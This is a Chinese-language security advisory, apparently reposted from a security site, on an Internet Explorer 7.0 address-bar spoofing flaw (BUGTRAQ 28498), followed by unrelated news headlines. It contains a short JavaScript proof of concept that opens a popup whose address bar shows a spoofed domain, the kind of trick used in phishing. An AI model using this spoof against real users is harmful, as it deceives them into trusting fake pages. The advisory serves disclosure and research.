受影响系统:MicrosoftInternetExplorer7.0描述:BUGTRAQID:28498InternetExplorer是微软发布的非常流行的WEB浏览器。如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有
受影响系统:
  Microsoft Internet Explorer 7.0   描述:   BUGTRAQ ID: 28498   Internet Explorer是微软发布的非常流行的WEB浏览器。   如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。   <*来源:Juan Pablo Lopez Yacubian ([email protected])   链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2   *>   测试方法:   警 告   以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <script language="JavaScript">
function iniciar()
{ nuevaventana = window.open("", "Win", "width=500,height=500,location=1"); nuevaventana.document.location = "http://www.google.com.ar/#" "www.microsoft.com/"; }
iniciar()
</script>

  建议:   目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:   http://www.microsoft.com/windows/ie/default.asp

最新资讯
人民日报:室内空气污染 别成“呼吸之痛”

人民日报:室内空气污染

日前,自如出租房被曝出甲醛超标,一时间,有关甲醛等装修污
股价跌逾8% eBay可能比它想象中的更需要Paypal

股价跌逾8% eBay可能

周五eBay股价在华尔街遭受重创,原因是PayPal在财报中表
受云业务提振 微软或将是下一个万亿美元市值成员

受云业务提振 微软或

Wedbush分析师Daniel Ives在最新报告中称,受益于云业务
谷歌将向手机商收费:每个设备最高40美元

谷歌将向手机商收费:每

据知情人士周五透露,Alphabet 的子公司谷歌推出新的授
P2P自查后迎现场检查 部分平台股权冻结

P2P自查后迎现场检查

P2P正迎来新一轮的闯关,在提交自查报告之后,新一轮的自
"协鑫系"再讲资本故事 协鑫智慧能源拟三度上市

"协鑫系"再讲资本故

拿下“壳资源”江苏霞客环保色纺股份有限公司8个月后,
最新文章
CPU幽灵和熔断漏洞是什么?Intel为大家简单易懂的科普了一番

CPU幽灵和熔断漏洞是

不久前让整全行业紧张、全球用户恐慌的Spectre幽灵、M
解析文件上传漏洞 从FCKEditor文件上传漏洞谈起

解析文件上传漏洞 从F

大部分的用户可能不要了解文件上传漏洞,下面小编就为大
手把手教你如何构造Office漏洞POC(以CVE-2012-0158为例)

手把手教你如何构造Of

近年来APT追踪盛行,最常见的就是各种以钓鱼开始的攻击
漏洞 自动化脚本 论漏洞和自动化脚本的区别

漏洞 自动化脚本 论漏

漏洞无处不在,它是在硬件、软件、协议的具体实现或系统
Python 爬虫修养-处理动态网页

Python 爬虫修养-处理

在爬虫开发中,大家可以很轻易地 bypass 所谓的 UA 限制
黑客通过Paypal可传输恶意图像

黑客通过Paypal可传输

PayPal解决了一个可被黑客用来向支付页面插入恶意图像